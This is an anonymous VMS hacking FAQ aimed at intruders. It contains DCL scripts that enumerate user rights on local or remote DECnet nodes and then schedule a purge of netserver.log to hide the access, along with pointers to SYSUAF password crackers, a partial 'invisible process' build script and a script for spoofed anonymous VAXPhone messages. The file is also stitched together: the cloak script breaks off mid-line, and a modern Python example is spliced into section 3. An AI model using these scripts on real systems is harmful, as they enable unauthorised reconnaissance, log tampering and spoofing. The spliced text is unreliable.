File 1/1 (originally 2 parts)
By: Who the hell knows? Anonymous??

"VMS HACK FAQ"

Questions/Index:

  1. VMS Basic information ("What does VMS run on?")
  2. Password storage information (SYSUAF.DAT) ("Where the hell is the /etc/passwd file??!?!?!")
  3. User storage information (RIGHTSLIST.DAT)
  4. Cracking the SYSUAF.DAT ("Is there a version of 'Crack' for VMS machines?")
  5. Becoming invisible in VMS ("Is there a 'Cloak' routine in VMS?")
  6. SET DEFAULT command ("How do I change the damn directory?")
  7. The infamous "CD" .COM file ("I hate this SET DEFAULT crap")
U 8. LOGIN.COM ("Okay, where's my .profile???")
  9. Captive Accounts ("I can't get to DCL")
  10. Terminal Spoofing ("How can I passively gather passwords at a terminal?")
  11. User Impersonation ("Can I masquerade as another user?")
U 12. Accounting/Auditing ("Who's watching me?")
  13. Software Licenses ("Can I pirate VMS software?")
  14. Dialouts ("Is there a modem on my system?")

VMS File Hack Routines:
  1. Disappearing Files ("Can I hide files in VMS?")
  2. Linking Files ("Can I create a Unix link-like file?")
  3. Scavenging ("Can I undelete someone else's files?")
N 4. Checksumming Files ("Can I tell if a file has been modified?")

VMS Mail Hack Routines:
  1. Fake Mail ("How do I send fake mail to VMS machines?")
  2. Unix/VMS Sendmail holes ("Will my sendmail holes work on VMS?")
U 3. Mail Bomb ("I need to mailbomb a user from my VMS account, how?")
N 4. Mail Users ("Can I find out if a remote account exists via mail?")

VMS Phone Hack Routines:
  1. Anonymous Phone Messages ("How do I become a VAXPhone phreaker?")
  2. Phone Directories ("How can I do a 'sh users' using the phone protocol?")

User/Image Privilege Information:
  1. System Privileges, listing and explanation ("How are privs set up?")
  2. Creating privileged images ("Can I create a SUID shell on a VMS box?")

DECnetwork Information:
  1. Brief Description of a DECnet ("What's a DECnet?")
  2. What it means to you ("What can it do for me?")
  3. Obtaining files/system info/etc ("How do I get information from the remote?")
  4. Using remote nodes ("How do I connect interactively?")
  5. Getting node lists ("How do I find connectable nodes?")
  6. Proxy Logins ("Can't DECnet nodes be protected?")
  7. Proxy Logs ("Are Proxy logins logged? Can I use it to break into nodes?")
  8. Sneak Routing ("Can I get to a machine I normally couldn't through another machine?")
N 9. Remote Procedures ("Can I remotely batch?")

TCP/IP Connected VMS Machines:
  1. Obtaining remote usernames without "FINGER" ("How do I get usernames if FINGER is disabled?")
  2. Changing the image running in FINGER ("How do I link a command name to another so it appears I am running a different image?")
U 3. The TCPDUMP sniffer, other programs

N Famous VMS Hacks/Holes:
  1. Trojan horsies, worms, and trap doors
  2. Major version vulnerabilities

- More Common Newbie Questions -

1. "What does VMS run on?"

VMS (Virtual Memory System) runs on Digital Equipment Corp. (DEC, pronounced "DECK") VAX (Virtual Address eXtension) machines and the newer Alphas. The user uses DCL (DEC Command Language) to interact with the computer. These commands and their syntax are completely different from those of Unix and Unix-like operating systems, so a completely different mindset is often required (this is the author's opinion).

2. "Where in the hell is the passwd file???!?!?!"

There is no /etc/passwd file. All user information is kept in a file called SYSUAF.DAT, which is stored in the directory (or rather the logical) SYS$SYSTEM. This file is usually not readable by "normal" users. VMS standard accounts (SYSTEM, FIELD, etc.) no longer have default passwords. VMS has the capability of setting secondary passwords on accounts.

3. One file that is available to "normal" users is SYS$SYSTEM:RIGHTSLIST.DAT. This file has a list of users and their respective rights identifiers. Since the file isn't very readable, an extraction program is a nice tool to have.
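To show what the Extract_Rights procedure in this section computes without needing a VMS system, here is an added Python model (not part of the FAQ) of its three passes, run over constructed records; the 48-column layout and the field offsets are assumptions taken only from the procedure's own f$extract calls, not a RIGHTSLIST.DAT specification.

```python
# Added example (not from the FAQ): models the three-pass join performed by
# Extract_Rights.Com. Record layout is an ASSUMPTION taken only from the
# f$extract offsets in that procedure (0,4 id; 8,4 holder id; 16,32 name).

ID_SLICE = slice(0, 4)       # 4-char identifier value
HOLDER_SLICE = slice(8, 12)  # 4-char holder id; blank/NUL on a definition record
NAME_SLICE = slice(16, 48)   # 32-char user or identifier name

def make_record(ident, holder, name):
    """Build one constructed 48-column record for the sample data."""
    return ident.ljust(4) + "    " + holder.ljust(4) + "    " + name.ljust(32)

def split_sections(records):
    """Passes 1 and 2: users precede the first "BATCH " record; after it, an
    empty holder field marks an identifier definition, anything else a holder."""
    users, idents, holders = {}, {}, []
    in_users = True
    for rec in records[1:]:                        # procedure discards record 1
        ident, holder, name = rec[ID_SLICE], rec[HOLDER_SLICE], rec[NAME_SLICE].rstrip()
        if in_users and rec[16:22] == "BATCH ":    # f$extract(16,6,record)
            in_users = False
        if in_users:
            users[ident] = name                    # users.dat: "id name"
        elif holder.strip(" \0") == "":            # "holder is null"
            idents[ident] = name                   # rights.dat: "id name"
        else:
            holders.append((holder, ident))        # holder id -> identifier id
    return users, idents, holders

def join_rights(records):
    """Pass 3 (users_ids.dat): one (user, identifier) pair per held right,
    or (user, None) when no holder record matches the user's id."""
    users, idents, holders = split_sections(records)
    out = []
    for uid, uname in users.items():
        held = [idents.get(iid, "?") for hid, iid in holders if hid == uid]
        if held:
            out.extend((uname, h) for h in held)
        else:
            out.append((uname, None))
    return out

# Constructed sample records, not real RIGHTSLIST.DAT contents.
SAMPLE = [
    make_record("0000", "", "HEADER"),    # first record, skipped
    make_record("0011", "", "SYSTEM"),
    make_record("0012", "", "ALICE"),
    make_record("0013", "", "BOB"),
    make_record("8001", "", "BATCH"),     # first environmental identifier
    make_record("8002", "", "NETWORK"),
    make_record("8010", "", "OPERATOR"),
    make_record("8010", "0011", ""),      # SYSTEM holds OPERATOR
    make_record("8002", "0012", ""),      # ALICE holds NETWORK
]
```

join_rights(SAMPLE) yields the same "user identifier" pairs the procedure writes to users_ids.dat, with BOB listed alone because no holder record names his id.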
The following DCL procedure is just an example of such a program and probably shouldn't be used, especially on a large system, because of its inefficiency. It should lead you in the right direction though.

$! Program: Extract_Rights.Com
$! Author: Tsywt
$!
$ On Error Then $Goto Exit
$!
$ If F$mode() .Nes. "INTERACTIVE" then goto BATCH_END
$
$ Inquire system "Please enter system"
$ If system .eqs. ""
$ Then
$ Open/share in sys$system:rightslist.dat
$ Else
$ Open/share in 'system'::sys$system:rightslist.dat
$ Endif
$ Open/write out users.dat
$ Read/nolock in record
$Read_Loop1:
$ Read/nolock in record /end=Done_Users
$! If not at start of environmental identifiers
$ If f$extract(16,6,record) .nes. "BATCH "
$ Then
$ Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$ Else
$ Goto Done_Users
$ Endif
$ Goto Read_Loop1
$Done_Users:
$ Close out
$ Open/write out rights.dat
$ Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$Read_Loop7:
$ Read/nolock in record /end=Done_Rights
$! holder is null
$ If f$extract(8,1,record) .eqs. ""
$ Then
$ Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$ Endif
$ Goto Read_Loop7
$Done_Rights:
$ Close out
$!
$ Open/write out users_ids.dat
$ Open in2 users.dat
$Read_Loop2:
$ position = 0
$ Read/nolock in2 record1 /end=Done_Program
$Read_Loop3:
$! Go to first record in file because can't do key search on id
$ Open/share in3 rights.dat
$! Search holders for user id
$ Read/nolock/error=Done_No_Id in -
record2/index=1/key="''f$extract(0,4,record1)'"/end=Done_No_Id
$Read_Loop4:
$! Kluge because nulls cause problems on key search
$ If f$extract(8,4,record2) .nes. f$extract(0,4,record1)
$ Then
$ Read/nolock in record2/end=Done_No_Id
$ Goto Read_Loop4
$ Endif
$! Move to next holder match
$ temp_pos = position
$Read_Loop5:
$ If temp_pos .gt. 0
$ Then
$ Read/nolock in record2/end=Read_Loop2
$ If f$extract(8,4,record2) .nes. f$extract(0,4,record1)
$ Then
$ Goto Read_Loop2
$ Endif
$ temp_pos = temp_pos - 1
$ Goto Read_Loop5
$ Endif
$Read_Loop6:
$! Look for identifier id
$ Read/nolock in3 record3/end=Done_No_Id
$ If f$extract(0,4,record3) .eqs. f$extract(0,4,record2)
$ Then
$ Write out f$extract(5,32,record1) + " " + f$extract(5,32,record3)
$ position = position + 1
$ Close in3
$ Goto Read_Loop3
$ Endif
$ Goto Read_Loop6
$Done_No_Id:
$ Write out f$extract(5,32,record1)
$ Close in3
$ Goto Read_Loop2
$Done_Program:
$Exit:
$ Close/error=Close_In2 in
$Close_In2:
$ Close/error=Close_Out in2
$Close_Out:
$ Close out
$ Delete/erase users.dat.
$ Delete/erase rights.dat.
$ If system .nes. ""
$ Then
$ Submit/after="+:15"/keep/params=('system') extract_rights.com
$ Endif
$ Exit
$Batch_End:
$Clean_Up:
$! Clean up DECnet logging
$ Dir 'p1'::netserver.log
$ Purge/erase 'p1'::netserver.log
$ Exit

4. "Is there a version of "Crack" that I can run on a VMS machine?"

The Unix program "Crack" will not work, but there are password guessing routines available. The best one I have seen is GUESS_PASSWORD.EXE, which can be obtained from the following sites:

ftp.wku.edu:/vms/fileserv/uaf.zip
ftp.spc.edu:/macro32/savesets/uaf.zip

In order for the routine to work, you need access to the SYSUAF.DAT. This version works on both OpenVMS VAX and OpenVMS AXP. There is also a program available for the PC called VMSCrack 1.0. Once again, it requires that you have access to the SYSUAF.DAT so that you can copy it to the PC.

BTW: The VMS system maintains its own password dictionary to screen for common passwords, if desired. SYS$LIBRARY:VMS$PASSWORD_DICTIONARY.DATA contains ~43000 words. And if you think your machine doesn't contain X-rated stuff (ok, maybe R), check again.

5. "Is there a 'Cloak' routine in VMS?"

Yes. Below is the code needed to make your process invisible to "FINGER", "SHOW USERS", etc...
Also, check out Bruce Ellis' "Hitchhiker's Guide to VMS".

First, create the following file:

Name: BUILD_INVISIBLE.COM
---------------------------------[Cut Here]-----------------------------------
$ save_verify = 'f$verify(0)'
$ system = "vax" !Set to "alpha" for Alpha
$!
$! File to build Ehud Gavron's INVISIBLE
$!
$! Author: Hunter Goatley
$!
$ say := write sys$outp

- VAXPhone Information -

1. The phone protocol allows you to send messages. Example follows:

$! To send anonymous or fake messages (except for remote node system admins -
$! phone server logs) through the PHONE mailbox to any user logged on the NET,
$! similar to phone ringing messages broadcast to users' terminals; must only
$! have NETMBX privilege
$! Note:
$! This has the unfortunate side effect of kicking the user off his phone if
$! it's not a patched version.
$!
$ debug = "F"
$ null_byte[0,8] = 0
$ true_byte[0,8] = 1
$ false_byte[0,8] = 0
$ id_rmt_user[0,8] = 7 !text = id of remote user, status rtn
$ ring_rmt_user[0,8] = 8 !text = 1 byte, true if first ring, sts rtn
$ hang_up[0,8] = 9 !link broken, no status
$ master_busy[0,8] = 10 !when requested to do other functions
$ master_answer[0,8] = 11 !from another master
$ master_reject[0,8] = 12 !from another master
$ slave_exit[0,8] = 13 !command to slave
$ text[0,8] = 14 !text >= 1 char frag
$ request_dir[0,8] = 15 !null returned when done
$ force_third_party[0,8] = 17 !text is id of 3rd party
$ on_hold[0,8] = 18 !put target on hold
$ off_hold[0,8] = 19 !take target off hold
$!
$ status_unknown = 0 !Unknown problem
$ status_success = 1 !The operation was completed successfully.
$ status_isyntax = 2 !Invalid user syntax
$ status_nocomm = 3 !Slave could not communicate with user
$ status_missunam = 4 !Missing user name
$ status_nopriv = 5 !The slave does not have necessary privileges.
$ status_noexist = 6 !The specified Target user does not exist.
$ status_badterm = 7 !The Target's terminal cannot be used by PHONE.
$ status_logoff = 8 !The Target logged off during the procedure.
$ status_offhook = 9 !Target phone off hook (e.g., /NOBROADCAST set).
$!
$ remote_node = P1
$ if P1 .eqs. "" then read sys$command remote_node /prompt="node : "
$ remote_user = p2
$ if P2 .eqs. "" then read sys$command remote_user /prompt="user : "
$ remote_user := 'remote_user ! remove blanks and lowercases
$ local_user_in = "''P3'"
$ if P3 .eqs. "" then read sys$command local_user_in /prompt="text : "
$ local_user = "msg:: " + local_user_in + " " + null_byte
$ open/read/write link 'remote_node'::"29="
$ write link id_rmt_user,local_user,remote_user
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$ if debug then write sys$output "Link to phone setup"
$ if local_user_in .eqs. "" then goto exit
$ write link ring_rmt_user,local_user,true_byte
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$ if debug then write sys$output "1 ringy-dingy"
$ count = 1
$ on control_y then goto exit
$ goto exit
$LOOP:
$ write link ring_rmt_user,local_user,false_byte
$ read link ans
$ if f$cvui(0,8,ans) .ne. status_success then goto error
$ if count .ge. 3 then goto exit
$ count = count + 1
$ if debug then write sys$output count," ringy-dingies"
$ goto loop
$EXIT:
$ write link slave_exit,local_user
$ close link
$ if debug then write sys$output "Link cleared"
$ exit
$ERROR:
$! under development
$ write sys$output "An error has occurred."
$ close link
$ exit

2. The phone protocol allows you to get a list of interactive users on a system. From DEC's own archives, example follows:

$ vfy = f$verify(f$integer(f$logical("debug")) .or. f$integer('debug'+0))
$ if f$cvui(1,1,'debug'+0) .or. f$cvui(1,1,f$logical("debug")+0) -
then write sys$error "File: PHONEDIR.COM, 29-Feb-1984"
$!++
$! PHONEDIR.COM, E2.0 28-Oct-1985
$!
$! COPYRIGHT (c) 1984 By
$! DIGITAL EQUIPMENT CORPORATION, Maynard, Massachusetts 01754.
$! All Rights Reserved.
$!
$! This software is furnished without license and may be used and copied
$! only with the inclusion of the above copyright notice. No title to and
$! ownership of the software is hereby transferred.
$!
$! The information in this software is subject to change without notice
$! and should not be construed as a commitment by Digital Equipment
$! Corporation.
$!
$! Digital assumes no responsibility for the use or reliability of this
$! software.
$!--
$!++
$! Author: SWM, 29-Feb-84, PARROT::SWM
$!
$! Edited:
$! 23-Nov-84 SWM, User lookup, V3 compatibility, Psthru capability.
$! 24-Nov-84 DC, Added logical name translation.
$! 30-Nov-84 DC, '_' overrides logical, infn loop check.
$! 27-Oct-85 SWM, Protocol fix, pipelining, clean up code.
$!
$! Abstract:
$! Take a directory of users across network via phone protocol.
$!
$! Inputs: P1 = Node:: (or Node::Node::...) to get user list from;
$! or Node::User to check on. Remote user can be specified as
$! separate parameter P2. Double colon optional if single node.
$!
$!--
$INITIALIZE:
$ on control_y then goto close
$ set noon
$ v4 = "true"
$ if f$extr(0,2,f$getsyi("version")) .eqs. "V3" then v4 = "false"
$!$ error_status = %x1001C002
$ null[0,8] = 0
$!$ if v4 then old_msg = f$envi("message")
$!$ set message /nofacility/noseverity/noidentification/notext
$!
$ask_node_name:
$ if p1 .eqs. "" then read/end=exit/error=exit sys$command p1 /prompt="Node? "
$ if p1 .eqs. "" then goto exit
$!
$! allow override of node::user logical names
$ sanity_check = 0
$log_name_loop:
$ underscore_found = f$locate("_",p1) .eq. 0
$ if underscore_found then goto got_node_name
$ if f$logi(p1) .eqs. "" then goto got_node_name
$ p1 = f$logi(p1)
$ sanity_check = sanity_check + 1
$ if sanity_check .le. 64 then goto log_name_loop
$ goto error
$!
$got_node_name:
$! add username to node string if specified as separate parameter
$ if p2 .nes. "" then -
if f$extr(f$leng(p1)-2,2,p1) .eqs. "::" then p1 = f$extr(0,f$leng(p1)-2,p1)
$ if p2 .nes. "" then p1 = p1 + "::" + p2
$! check if single node specified without double colon.
$ if p2 .eqs. "" then -
if f$parse(p1,,,"node") .eqs. "" then p1 = p1 + "::"
$!- if f$extr(f$leng(p1)-2,2,p1) .nes. "::" then p1 = p1 + "::"
$!
$ if v4 then p1 = f$edit(p1,"trim,upcase,uncomment")
$ if .not. v4 then p1 := 'p1'
$ remote_user_name = f$parse(p1,,,"name")
$ node = f$extr(0,f$leng(p1)-f$leng(remote_user_name),p1)
$ if node .eqs. "" then node = f$logi("sys$node")
$! commented out: doesn't work if access ctrl (f$parse hides password).
$!$ remote_user = node - f$parse(f$extr(0,f$leng(node)-2,node),,,"node") -
$!- + remote_user_name ! remove any psthru node names...
$!
$ sanity_check = 0
$ temp = node
$ node_string = ""
$! loop to find name of destination node for use in phone protocol...
$dest_node_loop:
$ loc = f$loca("::",temp)
$ node_string = node_string + f$parse(f$extr(0,loc+2,temp),,,"node")
$! commented out for alternate node_string display if using access ctrl.
$!$ node_string = node_string + f$extr(0,loc,temp)
$!$ node_string = f$extr(0,f$loca("""",node_string),node_string) + "::"
$ remote_user = f$extr(0,loc,temp) ! last node
$ remote_user = f$extr(0,f$loca("""",remote_user),remote_user) ! minus a/c.
$ temp = f$extr(loc+2,999,temp)
$ sanity_check = sanity_check + 1
$ if f$loca("::",temp) .ne. f$leng(temp) .and. sanity_check .lt. 32 -
then goto dest_node_loop
$ remote_user = remote_user + "::" + remote_user_name
$!
$ if v4 then local_user = f$logi("sys$node") + -
f$edit(f$getjpi("","pid"),"trim,upcase")
$ if .not. v4 then local_user := 'f$logi("sys$node")''f$getjpi("","pid")'
$ local_user = local_user - "_" + null ! asciz string
$!
$CREATE_LINK:
$! noon is set so display error message
$ open/read/write slave 'node'"29="
$ save_status = $status
$!$ if save_status .eq. error_status then goto unreachable
$ if .not. save_status then goto exit
$!
$ if remote_user_name .eqs. "" then goto dir_function
$LOCATE_FUNCTION:
$ message[0,8] = 7 ! ID remote user
$ message = message + local_user + remote_user
$ write/error=error slave message
$ read/end=error/error=error slave record
$ if f$cvui(0,8,record) .eq. 1 then -
write sys$output "''remote_user' is currently available."
$! Note: These response values, while defined in the phone protocol, do
$! not seem to be supported in response to the ID function for VAXPhone.
$ if f$cvui(0,8,record) .eq. 6 then -
write sys$output "''remote_user' is not available."
$ if f$cvui(0,8,record) .eq. 7 then -
write sys$output "''remote_user''s phone is not usable by phone."
$ if f$cvui(0,8,record) .eq. 9 then -
write sys$output "''remote_user''s phone is off hook (/NOBROADCAST)."
$ if (f$cvui(0,8,record) .ne. 1) .and. (f$cvui(0,8,record) .ne. 6) .and. -
(f$cvui(0,8,record) .ne. 7) .and. (f$cvui(0,8,record) .ne. 9) then -
write sys$output "''f$fao("Bad status received = !2ZB.",f$cvui(0,8,record))
$ exit_command[0,8] = 13
$ write/error=error slave exit_command,local_user
$ goto close
$!
$DIR_FUNCTION:
$ message[0,8] = 15 ! Request directory
$ message = message + local_user
$ write/error=error slave message
$ write/error=error slave message ! Pipeline requests!!!
$ write/error=error slave message
$ write/error=error slave message
$! Pipelining limited to 2 extra requests max to keep procedure from hanging.
$! Worst case limit is (DECnet_Pipeline_Quota/DECnet_Buffer_Size) * 2 + 1
$print_header:
$ count = 0
$ write sys$output ""
$ write sys$output " Directory of Users on Node ",node_string
$ write sys$output ""
$! skip pipeline hack code as RMS timeouts don't work with DECnet yet.
$ GOTO LOOP
$!$ if .not. v4 then write/error=error slave message
$ if .not. v4 then goto loop
$! Put up to 8 requests in logical link pipe...
$ sanity_check = 3 ! number msgs in pipe.
$pipeline_hack:
$ sanity_check = sanity_check + 1
$ if sanity_check .ge. 8 then goto loop
$ write/error=error slave message
$ read/end=eof/error=pipeline_hack/timeout=0 slave record
$ goto loop_alt_entry
$!
$loop

(-eof-) (c)nXo/loteknologies